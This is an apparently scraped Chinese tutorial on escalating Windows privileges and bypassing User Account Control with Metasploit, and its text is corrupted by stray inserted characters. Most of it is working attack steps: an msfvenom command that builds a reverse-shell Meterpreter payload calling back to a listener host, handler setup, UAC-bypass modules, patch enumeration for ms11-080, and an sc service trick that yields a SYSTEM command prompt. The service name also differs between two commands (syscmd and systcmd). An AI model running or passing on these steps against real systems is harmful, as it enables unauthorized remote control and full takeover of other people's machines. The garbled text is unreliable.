UAC介紹
UAC(User Account Control)是微軟在 Windows Vista 以后版本引入的一種安全機(jī)制,通過(guò) UAC阀参,應(yīng)用程序和任務(wù)可始終在非管理員帳戶的安全上下文中運(yùn)行肝集,除非管理員特別授予管理員級(jí)別的系統(tǒng)訪問(wèn)權(quán)限。
當(dāng)前獲得的權(quán)限是存在于管理員組的時(shí)候但是并且是administrator這個(gè)用戶蛛壳,此時(shí)就可能需要我們進(jìn)行繞過(guò)UAC的操作杏瞻,否則雖然是管理員組但是實(shí)際上并沒(méi)有管理員所對(duì)應(yīng)的高權(quán)限操作,這個(gè)時(shí)候就需要bypass uac
木馬生成
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.0.107 LPORT=4444 -f exe -o payload.exe
本地監(jiān)聽(tīng)
msf > use exploit/multi/handler
msf exploit(handler) > set payload windows/meterpreter/reverse_tcp
msf exploit(handler) > set lhost 10.0.0.217
msf exploit(handler) > set lport 4444
msf exploit(handler) > exploit
開(kāi)始提權(quán)
getsystem
提權(quán)失敗? ?一般都是上面說(shuō)的uac的問(wèn)題? 常識(shí)??bypass uac
輸入background? ?讓該會(huì)話在后臺(tái)運(yùn)行? 不在這個(gè)模式下 沒(méi)辦法調(diào)用msf的提權(quán)模塊
使用提權(quán)工具
use exploit/windows/local/ask
set SESSION 2(這個(gè)session要和之前監(jiān)聽(tīng)的那個(gè)session一樣? 否則不成功)
set TECHNIQUE up.exe
set TECHNIQUE EXE
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.0.107
show options
sessions -i
exploit
或者使用
use exploit/windows/local/bypassuac
use exploit/windows/local/bypassuac_injection
使用漏洞提權(quán)
use post/windows/gather/enum_patches
需要設(shè)置一下session
如果目標(biāo)系統(tǒng)安裝了安全更新的話是無(wú)法提權(quán)成功的
出現(xiàn)這種情況就是無(wú)法成功提權(quán)? 可利用的漏洞都被打上補(bǔ)丁了
或者漏洞編號(hào):ms11-080
sc命令提權(quán)
windows 7、8衙荐、08捞挥、12、16下可以成功? 2003也可以
關(guān)于sc命令:
SC 是用于與服務(wù)控制管理器和服務(wù)進(jìn)行通信的命令行程序忧吟。提供的功能類似于“控制面板”中“管理工具”項(xiàng)中的“服務(wù)”砌函。
sc Create syscmd binPath= “cmd /K start” type= own type= interact
這個(gè)命令的意思是創(chuàng)建一個(gè)名叫syscmd的新的交互式的cmd服務(wù)
然后執(zhí)行
sc start systcmd,就得到了一個(gè)system權(quán)限的cmd環(huán)境